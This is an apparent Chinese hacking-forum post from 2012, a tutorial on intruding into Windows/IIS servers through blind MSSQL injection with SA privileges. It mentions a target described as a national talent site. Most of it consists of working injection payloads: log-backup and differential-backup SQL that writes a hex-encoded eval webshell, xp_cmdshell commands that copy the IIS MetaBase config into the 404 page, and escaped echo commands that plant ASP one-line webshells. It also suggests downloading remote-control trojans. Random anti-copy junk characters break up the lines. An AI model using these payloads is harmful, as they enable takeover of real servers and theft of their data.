中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————' }6 n+ f& f; y6 Y. A8 X, J+ a

2 Q1 V# ~9 \; E' A& [. r
& ~. ~: i, F7 n) k                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
) }' w; I/ J" K, r3 |% F0 v) o& [: V) m5 j8 x- m: @6 w( X5 B& a# ]
                                                                 3 W' }3 p8 C% F
                                                                 
7 l6 _# j3 k- i1 ~1 G3 \                                                                  论坛: http://www.90team.net/
9 `: @+ F+ `7 y3 f5 M$ K; B% p
  ^3 G# `6 m. v5 D5 }: @, T( U% [
1 G: x% w3 A2 ]
4 ]; k# [* \; K3 {+ S0 }友情检测国家人才网6 b7 c+ v. B" G; I7 E$ c8 k
! P7 D& B9 `* Y4 \' X

  T7 ^. [  r. W, K* G& ]6 z内容:MSSQL注入SA权限不显错模式下的入侵- {) G& L. c7 E
+ \1 A% R+ Q  {, Q. Y6 @  h
  I# C+ q3 R) K" J4 K; o" I
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。" d5 B1 J! F3 \1 S" O, ^( f& {

% z" \7 e3 F1 M% E% T2 h3 m我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
- m+ f, ?+ ?3 v/ l/ M4 u7 ~4 ]; s' ~; y) Q

, i3 N( U1 ]4 M' }这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
" j" ~  g* K  d$ J7 `
% v" b1 ~+ o# w5 s4 a+ `# J" R6 Y思路:
( }6 l- u9 w, ~
- b- H3 C! @2 j  X% [) b首先:
* [: O$ r* d  A9 P9 l# C
1 w/ |, G7 z' I' _3 h通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
/ ^! \+ u: b" h7 Z4 @$ D/ w0 @9 Z* n2 O
1.日志备份获得Webshell, c  `: J2 N) Y- s

: W( ~( C  y1 C2.数据库差异备份获得Webshell
# E& V; S- ^' ?" |3 y: b& G; n) |  k+ \$ t: S
4.直接下载免杀远控木马。9 X+ H& |; h, n; q' y) I
3 F. V2 D7 B- U
5.直接下载LCX将服务器端口转发出来' B8 N5 q8 H* _9 l( D

' o3 y/ x3 u' m, M' J$ T! D: h6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( m( g: y# x4 k7 y! a$ w, h
, C  T' y2 U9 T! X9 j+ N$ u1 p" E' o+ E" [) Y5 K8 y% x
. p" w* y0 x: S# K
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
2 x: r9 F" D$ X: O$ ?7 r4 U. _# B
我直接演示后面一个方法1 C! T$ _+ a9 n9 B: d6 c; z# C

# A* Q6 E% r* }% a8 N
. e$ R2 ]; {6 C# Z0 n6 ^' D分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
! N* m, m; @* J% {' w( |0 I; C
$ F: [$ I7 e$ |0 i3 A) o! G2 u( z+ Q0 d4 d0 S9 f  \: _
, l5 y, k6 Y8 `5 K6 L  h0 \
& g/ y9 C* `& P: c" ]. p* M% h* V6 H
◆日志备份:8 j" Q0 j# Q1 ]* a

' y2 {2 Q6 X1 ^$ ~$ |0 D& m4 e3 D6 s, W, @
1. 进行初始备份
3 N$ a/ p  e, K; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--6 ~# e* B) c- E. K( w: L
: O- u. f* e1 n* h5 Q- x7 \& ^
2. 插入数据
. H) n7 j5 a' ]/ r% f# h9 u8 L! d" K6 E;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--* ~4 G1 [4 l4 I( w# {! g( f

5 ~* `2 ^3 P( U) J% I' l8 n- p$ M/ S0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>2 b7 l; r' }& F% |% j9 H
  
  b, f* z9 t2 w3. 备份并获得文件,删除临时表; t6 `2 z3 l4 m1 p5 C/ g
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
: M. ?" S% d8 \& j
: |/ Q7 k) Y( w% g3 S8 j
$ }# I% Z7 {; Q6 x& I6 K  i9 b! w4 K- |" |7 H9 V
◆数据库差异备份' x4 |  \/ W, N

3 n6 k+ K. G* S; G" K9 R(1. 进行差异备份准备工作# o# l8 J' z6 p# g" e
' {; u9 y7 l8 f
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
( `; X* k, r# m# a7 J0 K- \
4 a. V: Z, @3 w+ j- J& x上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码/ `+ d: }# _3 B. h( w$ Y1 A

+ j! y* W  |# o& l" m* k8 r
/ y) {  t+ q- ^(2. 将数据写入到数据库1 f  b8 P4 T6 @+ Q) M
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 3 f% F5 C! t: B7 m+ ~# @3 J( Q) l) o

6 @- i4 g4 G2 z6 t0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  S$ w! R/ P  F' J6 L  g) O! m! W6 |0 Z7 `+ W
3. 备份数据库并清理临时文件
1 U2 Y, g3 ]2 B; C' t
9 W. @& \) A2 g! K( W/ O;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
& [; Q8 O- ?! U; F2 ?6 @( D3 D0 c  F! L3 N' C7 v* {( a, I
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ; k, b. o, |2 \9 U9 G+ d4 a
. t6 u7 b) |: R) v+ w7 g

' G5 X+ C, ^$ R8 I& n3 c8 ~
2 [  C7 V7 T& K6 U5 O+ T3 e: n用^转义字符来写ASP(一句话木马)文件的方法:   - F3 h! {  ]: _2 g2 H; A5 R
/ D; a% j1 n8 ^: ~1 U% ~1 ^/ A
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--2 i( U. e; {* H) r# \

; ?( O5 [. g) G* o2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 4 U& X3 U# y% x. z/ k
+ q: y1 G3 ^% E0 ^5 {  W- U
读取IIS配置信息获取web路径1 O9 }9 t$ f5 w3 {5 k( j0 h/ a* x

0 U5 X1 h: {$ Y- m# A4 u' h     - A* {- g& |1 |. H2 O
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--& j; k$ e! n8 j8 t; h4 U2 D+ h

4 b7 |% N9 i2 `6 E& k执行命令
! ?0 K6 y% t, a  U8 S     5 ]( m/ a, `2 X( \! a0 a
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--) G7 z/ ~3 {4 D* V  R! |

2 `. E6 b4 c3 q# I# ~
; y* R+ k6 D* S( h
) w, D" b8 [9 T% o
5 o& d- |0 e2 ]' D% ^; L1 u0 {1 d, t% i) E

, @" Y7 U- {9 d* L. w/ p0 A9 d% w/ p  G' w( t' a

6 W: Q2 R* X5 T* ]4 A( c$ _0 Y' R$ y7 C7 [
, Y1 o' P- o. w

5 f3 m, p, B4 r7 u  c$ W* k  W7 w  \' l- X+ X, i

2 {8 z7 f2 q7 ~! i- a, @) p1 G0 e- [9 w2 i" G+ s+ Q

5 ]4 x, y0 X. Q4 P* a" x
% q4 h0 D- h) e5 _: @$ Y* l
7 j4 }/ h5 ]6 b: C- L) E2 g* m& k5 z; D2 H. w% I) ~
: x" q* ~1 P3 X
; n& U: L0 q, H+ M+ S) B  n1 N
3 c: a2 @* N' Q
* h1 \, [% b" M3 h' A! q
7 P" ~& y  B6 c% o9 j; h
2 O" Z9 l* C' _. C* n

4 I# ~1 S' d/ ?: D- b3 r* q7 Q: F6 e4 t, \# T8 X% t5 ~
) n, \0 ^; a( {& ?

; ?8 r% m. _* u1 v
2 J  Q+ e* X7 n( N) W- _2 s( f! h+ z4 d; O3 z/ F) e- g7 l6 O
& O% Y$ i9 J" ~7 x+ d5 o
% w2 [6 \2 t# J' r* V

- X" K/ f: b2 J3 V( Z' y' L( P2 t
. m7 F, X& f0 b) B6 a
; B5 C! Z: n1 ]: _$ w% Y9 T

, L% p' T4 ^( ?* }, L2 |& T
/ Y' U& v- r' r$ B( O1 N9 {7 `& b" g+ M. S8 X/ n) l

. Y; v' ^: I/ E, c: c5 e2 z7 H7 N$ `6 e6 S

, K* ~+ l$ |6 I8 V/ [* Z+ n" ~+ Z5 F5 Z
4 h$ \+ `# f$ X1 f* q& `$ l

! ^, Q0 n: ]# z* }5 _9 I* C4 X/ c1 ~6 ]
/ j: z1 D9 M; l2 ^0 C
& ?8 I9 p) C3 n" y, w' r' Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2